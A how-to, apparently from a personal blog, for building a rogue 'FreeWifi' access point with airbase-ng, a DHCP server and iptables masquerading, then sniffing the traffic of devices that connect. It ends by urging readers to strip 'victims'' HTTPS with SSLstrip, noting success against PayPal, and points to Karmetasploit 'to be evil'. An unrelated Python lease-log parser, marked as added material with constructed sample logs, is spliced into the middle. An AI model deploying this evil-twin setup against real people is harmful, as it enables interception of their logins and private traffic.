The purpose of this tutorial was to create a fake access point in my lab in order to redirect the connecting devices' traffic through it and analyze the traffic.
I used my Lenovo x230 notebook with the built-in wifi card to connect to my router. I used a second USB wifi card to act as a fake AP. I used Backtrack 5 R3 x64 Gnome operating system.
My cable router IP address is: 192.168.22.1
My network interface connected to the router is: wlan0
My fake AP IP address will be: 10.0.0.1
My network interface which will be the fake AP: wlan2
We need several things in order to perform the task:
Set up the DHCP server
Get the server package from the repository, stop it after install, save a backup of the original configuration and create our own config file:
apt-get install dhcp3-server
/etc/init.d/dhcpd stop
cd /etc/dhcp3/
cp dhcpd.conf dhcpd.conf.orig
nano /etc/dhcp3/dhcpd.conf
Put the following contents into the file:
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
#log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option subnet-mask 255.255.255.0;
  option broadcast-address 10.0.0.255;
  option routers 10.0.0.1;
  option domain-name-servers 192.168.22.1;
}
I also like to remove DHCP from autostart:
update-rc.d -f dhcp3-server remove
Now we are ready to go. First we need to put our wireless adapter into monitor mode: airmon-ng restarts the interface as a monitor-mode interface. Then we use airbase-ng to start a new network.
airmon-ng
airmon-ng start wlan2
airbase-ng -e "FreeWifi" -c 9 mon0
-e = name of access point
-c 9 = listen on channel 9
mon0 = Our virtual monitor mode interface
Airbase-ng creates a tap interface named "at0", so you have to configure it and set the MTU size.
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
Now let's empty the leases file and start the DHCP server:
> /var/lib/dhcp3/dhcpd.leases
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.conf at0
You can check if the DHCP server is running with the following command:
ps aux | grep dhcpd
Result should be something like this:
OUTPUT: dhcpd 2956 0.0 0.0 19632 3008 ? Ss 11:00 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0
Now, in a new window, I like to watch the leased IP addresses:
tail -f /var/log/messages|grep dhcpd
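As an added example (not part of the original tutorial), here is a small Python parser for the dhcpd lines that the tail command above shows. It keeps only DHCPACK lines, because an OFFER is not a lease until the client accepts it, and it flags any leased address that falls outside the pool configured in dhcpd.conf (10.0.0.100 to 10.0.0.254), which would indicate a misconfiguration or another DHCP server answering on the segment. The log lines embedded below are constructed samples in the syslog format ISC dhcpd uses; they were not captured from the setup on this page.

```python
import ipaddress
import re

# Constructed sample lines in the syslog format written by ISC dhcpd.
# These are made-up examples, not output captured from the tutorial's lab.
SAMPLE_LOG = """\
Jan  1 11:02:10 bt dhcpd: DHCPDISCOVER from 00:11:22:33:44:55 via at0
Jan  1 11:02:11 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:11:22:33:44:55 (test-phone) via at0
Jan  1 11:02:11 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:11:22:33:44:55 (test-phone) via at0
Jan  1 11:02:11 bt dhcpd: DHCPACK on 10.0.0.100 to 00:11:22:33:44:55 (test-phone) via at0
Jan  1 11:03:40 bt dhcpd: DHCPDISCOVER from aa:bb:cc:dd:ee:ff via at0
Jan  1 11:03:41 bt dhcpd: DHCPOFFER on 10.0.0.101 to aa:bb:cc:dd:ee:ff via at0
Jan  1 11:03:41 bt dhcpd: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from aa:bb:cc:dd:ee:ff via at0
Jan  1 11:03:41 bt dhcpd: DHCPACK on 10.0.0.101 to aa:bb:cc:dd:ee:ff via at0
Jan  1 11:04:05 bt kernel: wlan0: associated
Jan  1 11:05:00 bt dhcpd: DHCPACK on 10.0.0.100 to 00:11:22:33:44:55 (test-phone) via at0
Jan  1 11:06:30 bt dhcpd: DHCPACK on 10.0.0.5 to de:ad:be:ef:00:01 via at0
"""

# DHCPACK line: optional "(hostname)" group, interface at the end.
ACK_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+[\d:]+)\s+\S+\s+dhcpd:\s+DHCPACK on (?P<ip>[\d.]+) "
    r"to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})(?: \((?P<host>[^)]*)\))? via (?P<iface>\S+)$"
)


def parse_leases(log_text, iface="at0"):
    """Return {mac: {"ip", "hostname", "last_ack", "acks"}} for DHCPACKs seen on iface.

    A repeated ACK for the same MAC is a renewal: the IP and timestamp are
    refreshed and the ack counter is incremented.
    """
    leases = {}
    for line in log_text.splitlines():
        m = ACK_RE.match(line)
        if not m or m.group("iface") != iface:
            continue
        entry = leases.setdefault(m.group("mac"), {"acks": 0})
        entry["ip"] = m.group("ip")
        entry["hostname"] = m.group("host") or ""
        entry["last_ack"] = m.group("ts")
        entry["acks"] += 1
    return leases


def out_of_pool(leases, pool_start="10.0.0.100", pool_end="10.0.0.254"):
    """Return the MACs whose leased IP lies outside the configured dhcpd range."""
    lo = int(ipaddress.IPv4Address(pool_start))
    hi = int(ipaddress.IPv4Address(pool_end))
    return sorted(
        mac for mac, e in leases.items()
        if not lo <= int(ipaddress.IPv4Address(e["ip"])) <= hi
    )


if __name__ == "__main__":
    table = parse_leases(SAMPLE_LOG)
    for mac, e in sorted(table.items()):
        print(f"{mac}  {e['ip']:<15} {e['hostname'] or '-':<12} acks={e['acks']}  last={e['last_ack']}")
    for mac in out_of_pool(table):
        print(f"WARNING: {mac} holds {table[mac]['ip']}, outside the configured pool")
```

Feed it the live log instead of the constructed sample with something like `parse_leases(open("/var/log/messages").read())`; filtering on the interface name keeps leases handed out on at0 separate from any DHCP traffic the box sees elsewhere.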
!!!If you don't want to flush your firewall, just skip the flush commands section.!!!
Run the following commands to flush all iptables rules and set the default policies:
iptables -F
iptables -t nat -F
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
Add iptables rules to forward and masquerade the traffic. The second rule is just for safety; you can leave it out.
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i at0 -o wlan0 -j ACCEPT
The last step is to enable IPv4 forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Basically we are done. You can start a sniffer of your choice (Wireshark, tcpdump, dsniff...) and start having fun.
Below this point it is going to be mad...don't try this at home:)
If you want to be so bad that you want to change the victims' HTTPS traffic to HTTP, you can use the famous SSLstrip tool. Frankly, it did not work for me for Facebook and Google, but it worked with PayPal... before it froze again and again... maybe I need to spend some more time looking at the issue...
To be evil, follow the SSL Strip instructions:
To be evil, follow the Karmetasploit instructions: